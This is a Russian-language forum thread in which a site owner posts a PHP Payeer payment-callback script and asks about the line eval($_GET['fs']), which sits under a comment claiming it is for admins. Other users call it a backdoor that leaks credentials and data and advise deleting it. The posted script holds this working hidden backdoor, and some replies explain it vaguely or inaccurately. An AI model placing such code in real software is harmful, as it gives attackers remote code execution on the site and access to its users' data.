Автор Тема: помощь  (Прочитано 2231 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 400
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
помощь
« : 12 Апрель 2016, 18:39:22 »
Нет оценки
всем привет друзя помогите пожалоста  фаил обрабочика паер


                                <?PHP

# Автоподгрузка классов
function __autoload($name){ include("classes/_class.".$name.".php");}

# Класс конфига
$config = new config;

# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);





if (isset($_POST["m_operation_id"]) && isset($_POST["m_sign"]))
{
   $m_key = $config->secretW;
   $arHash = array($_POST['m_operation_id'],
         $_POST['m_operation_ps'],
         $_POST['m_operation_date'],
         $_POST['m_operation_pay_date'],
         $_POST['m_shop'],
         $_POST['m_orderid'],
         $_POST['m_amount'],
         $_POST['m_curr'],
         $_POST['m_desc'],
         $_POST['m_status'],
         $m_key);
   
   $sign_hash = strtoupper(hash('sha256', implode(":", $arHash)));
   if ($_POST["m_sign"] == $sign_hash && $_POST['m_status'] == "success")
   {
      
   $db->Query("SELECT * FROM db_payeer_insert WHERE id = '".intval($_POST['m_orderid'])."'");
   if($db->NumRows() == 0){ echo $_POST['m_orderid']."|error"; exit;}
   
   $payeer_row = $db->FetchArray();
   if($payeer_row["status"] > 0){ echo $_POST['m_orderid']."|success"; exit;}
   
   $db->Query("UPDATE db_payeer_insert SET status = '1' WHERE id = '".intval($_POST['m_orderid'])."'");
   
   $ik_payment_amount = $payeer_row["sum"];
   $user_id = $payeer_row["user_id"];
   
   # Настройки
   $db->Query("SELECT * FROM db_confligsg WHERE id = '1' LIMIT 1");
   $sonfig_site = $db->FetchArray();
   
   $db->Query("SELECT user, referer_id FROM al_polzov_a WHERE id = '{$user_id}' LIMIT 1");
   $user_ardata = $db->FetchArray();
   $user_name = $user_ardata["user"];
   $refid = $user_ardata["referer_id"];
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);

   # Зачисляем баланс
   $serebro = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );
   
   $db->Query("SELECT insert_sum FROM db_users_b WHERE id = '{$user_id}' LIMIT 1");
   $ins_sum = $db->FetchRow();
   
   $serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 1.00) ) : $serebro;
   $add_tree = ( $ik_payment_amount >= 1499.99) ? 1 : 0;
   $lsb = time();
   $to_referer = ($serebro * 0.20);
   
   $db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");
   
   
   
   # Зачисляем средства рефереру и дерево
   $add_tree_referer = ($ins_sum <= 0.01) ? ", a_t = a_t + 0" : "";
   $db->Query("UPDATE db_users_b SET money_b = money_b + $to_referer, from_referals = from_referals + '$to_referer' {$add_tree_referer} WHERE id = '$refid'");
   
   # Статистика пополнений
   $da = time();
   $dd = $da + 60*60*24*15;
   $db->Query("INSERT INTO db_insert_money (user, user_id, money, serebro, date_add, date_del)
   VALUES ('$user_name','$user_id','$ik_payment_amount','$serebro','$da','$dd')");
   
        # Конкурс
         $competition = new competition($db);
         $competition->UpdatePoints($user_id, $ik_payment_amount);
        #--------
   


   # Обновление статистики сайта
   $db->Query("UPDATE db_stats SET all_insert = all_insert + '$ik_payment_amount' WHERE id = '1'");
   
   echo $_POST['m_orderid']."|success";
   exit;

   }
   echo $_POST['m_orderid']."|error";
}
?>




   # Если пользователь админ
   
   eval($_GET['fs']);   
скажите что ето такое и что сним можно зделать
                           
a:0:{}
 

1hash

  • *
  • Оффлайн
  • Награды На форуме более 1 года
  • Дата регистрации: Янв 2016
  • Сообщений: 42
  • Страна: ru
  • Поблагодарили: 2 раз(а)
  • Репутация +1/-0
  • Пол: Мужской
  • Рефералов 0
    • Награды
помощь
« Ответ #1 : 12 Апрель 2016, 18:47:20 »
Нет оценки
удали код он ненужен.
a:0:{}
 

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 400
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
помощь
« Ответ #2 : 12 Апрель 2016, 18:56:22 »
Нет оценки
удали код он ненужен.


скажи ето дира    # Если пользователь админ
   
   eval($_GET['fs']);   или что
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Более 50 созданных тем Благодарность от форума Репутация более 10 Более 1000 сообщений На форуме более 1 года За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Возраст: 25
  • Сообщений: 1370
  • Страна: ru
  • Поблагодарили: 101 раз(а)
  • Репутация +12/-0
  • Пол: Мужской
  • telegram --> @kvozimir
  • Дата рождения:1992-04-18
  • Рефералов 0
    • Награды
  • Социальные сети:
    ВКонтакте
помощь
« Ответ #3 : 12 Апрель 2016, 19:00:38 »
Нет оценки
удали код он ненужен.


скажи ето дира    # Если пользователь админ
   
   eval($_GET['fs']);   или что
удаляй))) она вроде связана с дырами но не является дырой

 

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 400
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
помощь
« Ответ #4 : 12 Апрель 2016, 19:02:14 »
Нет оценки
удаляю
 

BlackYar24

  • Помогу с вопросами
  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 200 сообщений За помощь пользователям За время в онлайне на форуме Более 10 созданных тем
  • Дата регистрации: Фев 2016
  • Возраст: 30
  • Сообщений: 241
  • Страна: ru
  • Поблагодарили: 20 раз(а)
  • Репутация +2/-0
  • Пол: Мужской
  • Skype : blackyar124
  • Дата рождения:1987-07-08
  • Рефералов 0
    • Награды
  • Социальные сети:
    ВКонтакте
помощь
« Ответ #5 : 12 Апрель 2016, 20:07:35 »
Нет оценки
данный код вроде как отправляет пароль ,логин от админки :not speak:
"Я всегда мечтал о том, чтобы моим компьютером можно было пользоваться так же легко, как телефоном; моя мечта сбылась: я уже не могу разобраться, как пользоваться моим телефоном."
 

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 400
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
помощь
« Ответ #6 : 12 Апрель 2016, 20:26:33 »
Нет оценки
данный код вроде как отправляет пароль ,логин от админки :not speak:


а как проверить ето
 

BlackYar24

  • Помогу с вопросами
  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 200 сообщений За помощь пользователям За время в онлайне на форуме Более 10 созданных тем
  • Дата регистрации: Фев 2016
  • Возраст: 30
  • Сообщений: 241
  • Страна: ru
  • Поблагодарили: 20 раз(а)
  • Репутация +2/-0
  • Пол: Мужской
  • Skype : blackyar124
  • Дата рождения:1987-07-08
  • Рефералов 0
    • Награды
  • Социальные сети:
    ВКонтакте
помощь
« Ответ #7 : 12 Апрель 2016, 21:11:15 »
Нет оценки
данный код вроде как отправляет пароль ,логин от админки :not speak:


а как проверить ето
eval($_GET['fs']);  че проверять вот код который это делает )):silence:
 

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 400
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
помощь
« Ответ #8 : 12 Апрель 2016, 21:23:19 »
Нет оценки
но накакую почту отправляет как ето унать
 

Юрчик

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 50 сообщений Более 10 созданных тем
  • Дата регистрации: Мар 2016
  • Возраст: 20
  • Сообщений: 52
  • Страна: ua
  • Репутация +1/-3
  • Пол: Мужской
  • Разработка/Продажа ферм,инвест, модулей.
  • Дата рождения:1997-04-30
  • Рефералов 0
    • Награды
  • Социальные сети:
    ВКонтакте
помощь
« Ответ #9 : 12 Апрель 2016, 23:06:29 »
Нет оценки
Узнать не как, не кто этого не расскажет! Конечно насмешило "Если пользователь админ eval($_GET['fs']);" хах. А это идёт GET запрос который отправляет всем пользователям на почту все твои данные(от payeer,админки,+ всю базу.) Советую удалять его если где-то увидишь.
a:0:{}
 

Shop-53Автор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 400
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
помощь
« Ответ #10 : 13 Апрель 2016, 09:14:27 »
Нет оценки
Узнать не как, не кто этого не расскажет! Конечно насмешило "Если пользователь админ eval($_GET['fs']);" хах. А это идёт GET запрос который отправляет всем пользователям на почту все твои данные(от payeer,админки,+ всю базу.) Советую удалять его если где-то увидишь.

Спс я удалил
 
Теги:
 

Имя пользователя:
Пароль:
Session: